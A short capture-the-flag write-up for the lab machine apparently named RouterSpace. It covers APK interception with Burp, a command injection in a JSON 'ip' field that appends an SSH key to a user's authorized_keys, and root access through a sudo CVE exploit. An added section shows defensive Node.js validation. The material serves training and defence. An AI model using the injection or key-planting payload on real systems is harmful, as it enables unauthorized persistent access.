Engagement flow
Enumeration
Port discovery
Web enumeration
apk download
Browsing to the website, we see two options: a download and a "get started now".
We download the provided APK.
From here, we install and run Anbox on our target. Once Anbox is open, we have to install the actual .apk.
User
We have to change our network settings in order to intercept and proxy the request with Burp Suite.
adb shell settings put global http_proxy 192.168.250.1:8080
This did not work. After some review, I realized the host was routerspace.htb and that this needed to be added to the /etc/hosts file.
I was not able to gain a reverse shell, so I injected my SSH key instead.
{"ip":"0.0.0.0 | echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDCu8ID9aG93wVDfA3M7x6McWMDGvzVC4LlWjoDZtJ33Xpzi7483Dxt4+WczJdCAlWJKw1In4Orc1QcINCHBy6hK0UteKU3OevHn9IhpyoZF1FsFi/zo6brldA4pSTOBBT6zDf3VzVtgEwkRe5YaLZLMoD/lBvYLKyboJcQ90zTwBcNEL029b5a1YLx/ZZcTgaZEOKrC7rck9l3uu9rW8pqGTrm/kkV7ad+CrH4tHil4uNnkVSQp6BA1oQh1xAuCvq494zZu5Z+sqOsHzMKp7U4ZvAG1vKxZdMSyKYp13kftK2Yj+dWDpIYZZqy0tqz1duSmgd7LK+dxc7wGOV6+FPqp4YcnY4xfnbKwh1WPZnL7EvYIzHqI4IYww7IMYBw2R+/+CtQpFj+rmX0FHUEPpu9YSjvC4o1N7pzo6/F8pIn7HjEiOg1vcwotCF3RM5UG2fkX0PdHJTXH9EL8lm351qkilf00ZFsZ8ovlvVtoIdcN0mwuh9I/1GeyDey2kmYC9c= kali@kali' >> /home/paul/.ssh/authorized_keys"}
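Why the request above succeeds, and the server-side check that stops it, as an added example that is not from the original write-up or the target application. It assumes a hypothetical handler that passes the JSON ip field to a diagnostic command (ping is a stand-in); the function names and sample bodies are constructed.

```javascript
// Added example: hypothetical server-side handling of the JSON "ip" field.
const net = require('node:net');
const { execFile } = require('node:child_process');

// Constructed sample bodies. The second has the shape of the request in the
// write-up, with the key material replaced by a placeholder.
const SAMPLE_OK = '{"ip":"0.0.0.0"}';
const SAMPLE_INJECTED =
  '{"ip":"0.0.0.0 | echo \'ssh-rsa <PLACEHOLDER_KEY>\' >> /home/paul/.ssh/authorized_keys"}';

// Parse the body and accept the value only if the whole string is an IP literal.
function parseIpField(rawBody) {
  let body;
  try {
    body = JSON.parse(rawBody);
  } catch {
    return { ok: false, reason: 'invalid JSON' };
  }
  const ip = body && body.ip;
  if (typeof ip !== 'string') return { ok: false, reason: 'ip must be a string' };
  // net.isIP returns 4 or 6 for a valid literal and 0 for anything else,
  // so trailing shell syntax ("| echo ... >> file") fails the check.
  if (net.isIP(ip) === 0) return { ok: false, reason: 'ip is not an IP literal' };
  return { ok: true, ip };
}

// Weak pattern, shown for contrast: the value is spliced into a shell command
// line, so "|" and ">>" inside it are interpreted by the shell.
function shellCommandLine(ip) {
  return `ping -c 1 ${ip}`;
}

// Hardened pattern: validate first, then pass the value as a single argv
// element to execFile, which does not start a shell.
function runDiagnostic(rawBody, callback) {
  const parsed = parseIpField(rawBody);
  if (!parsed.ok) return callback(new Error(parsed.reason));
  // "ping" is an assumed stand-in for whatever the real handler runs.
  execFile('ping', ['-c', '1', parsed.ip], { timeout: 5000 }, callback);
}
```

With this check the injected body is rejected before any process is started; on the detection side, unexpected appends to a user's authorized_keys file are the artifact this request leaves behind.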
Root
From here we are not able to get the LinPEAS script uploaded, so we pivot and enumerate manually. Checking the sudo version and researching it shows us a known CVE.
We copy the 3 files onto our target machine, run make followed by exploit, and we are root!